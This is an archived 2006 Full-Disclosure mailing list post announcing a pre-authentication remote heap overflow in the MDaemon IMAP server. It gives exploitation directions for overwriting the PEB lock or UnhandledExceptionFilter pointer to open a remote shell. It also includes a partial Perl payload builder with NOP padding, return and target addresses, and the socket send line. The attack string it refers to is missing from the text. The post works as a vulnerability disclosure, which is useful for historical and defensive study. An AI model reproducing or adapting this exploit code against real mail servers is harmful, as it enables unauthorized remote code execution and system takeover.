Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
[Full-disclosure] *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez*
From: kcope (kingcopegmx.net)
Date: Sun May 28 2006 - 08:24:30 CDT
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*
zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the
PEB Lock) :)
$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x
(0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/